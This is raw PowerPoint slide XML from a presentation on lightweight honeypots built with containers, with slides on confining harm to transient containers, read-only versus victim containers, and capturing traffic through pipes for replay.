      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0FCF0B8E-C764-B441-826F-3009896208B1}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF3C3831-60B9-204A-AB0D-53E619F83C5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4695600" y="1194628"/>
            <a:ext cx="3991200" cy="3394472"/>
          </a:xfrm>
          <a:ln w="25400">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="228600">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000" b="0" i="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="472040239"/>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7/21/19</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>© Steve Beaty and others</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0FCF0B8E-C764-B441-826F-3009896208B1}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19992734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7/21/19</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>© Steve Beaty and others</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0FCF0B8E-C764-B441-826F-3009896208B1}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15646966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7/21/19</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>© Steve Beaty and others</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0FCF0B8E-C764-B441-826F-3009896208B1}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40768472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3BAFF2B-B93B-4548-9062-8B819CFC4E97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2494276" y="4631436"/>
            <a:ext cx="6649724" cy="512064"/>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304538" y="4731545"/>
            <a:ext cx="876866" cy="364068"/>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7/21/19</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4448400" y="4734973"/>
            <a:ext cx="3301697" cy="36576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Steve Beaty and others</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8026967" y="4731545"/>
            <a:ext cx="659833" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{0FCF0B8E-C764-B441-826F-3009896208B1}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A02909B9-1145-F845-A930-8E33F2A03507}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="482596" y="4632335"/>
            <a:ext cx="2011680" cy="499403"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="372720526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Lst>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hf hdr="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s://github.com/drsjb80/HPotter"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commons.wikimedia.org/wiki/File:Tower_torre_pc_clon_server.svg" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://people-equation.com/killing-flies-with-honey-how-to-turn-a-frustrating-colleague-into-an-asset/honey-ja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B0B91-2419-CD4D-A468-120904B61BFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lightweight, Perfect Interaction Honey Pots via Containerization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{861E6E36-2F85-DF4E-B424-34E73E6FFFE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8186855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C0532-09AC-5C4B-8666-096294BED827}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No Harm Done</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{418FAC5B-0F60-0644-AB79-8BE820C2A286}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Harm only done to transient container</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Load on machine controlled by number of containers active</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0674498F-5008-0D41-99B7-7CF42389E2B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>7/21/19</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EBCDF08-6DB8-324F-AC4A-03AA057000B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>© Steve Beaty and others</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{924CBD68-DA0E-3749-AA4E-E8AD5C557F24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0FCF0B8E-C764-B441-826F-3009896208B1}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39066095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59E4D-5B6D-324D-B2B7-D34DF928D24E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Two Container Options</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6A58000-CEC5-C446-8335-2EC2C3370FBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Read-only container</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Alpine (etc.) Linux for telnet and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Apache, only have to deal with logging</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Victim containers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MySQL/Maria, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5E0017C-E647-1342-933A-BC860FDFF8B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>7/21/19</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FC77F44-0FBC-9E4C-ABD7-122DEA5F2FD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>© Steve Beaty and others</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AF206D7-162C-9942-95EA-6D7D240D938F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0FCF0B8E-C764-B441-826F-3009896208B1}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17421741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F7F9-A044-C040-8B52-D9853BD85645}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Either way: Pipes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FE1B1E0-4631-6742-A85D-3606A3E9D7D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Capture requests and possibly responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We can always replay</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D09B3D31-CB3E-E249-B7C4-1019F4DB1ACF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>7/21/19</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F039C2AC-4556-D44F-B432-051BA29D9C34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>© Steve Beaty and others</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A303A843-8B1E-4D44-AE3D-F9D0A5D9E15B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0FCF0B8E-C764-B441-826F-3009896208B1}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41086110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8BB57-5275-5E44-A327-E2D04ECECBDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pipes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Date Placeholder 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96158939-EC9B-A445-B3BC-BFD15412ED7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>7/21/19</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Footer Placeholder 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C80D3146-B449-8541-B70A-7E3DBC87D785}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>© Steve Beaty and others</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Slide Number Placeholder 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D9F86FA-B9A7-4446-9962-C5FEF2AC7053}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0FCF0B8E-C764-B441-826F-3009896208B1}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rounded Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC58B67B-0D3B-ED44-8058-7A1A1B414B4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
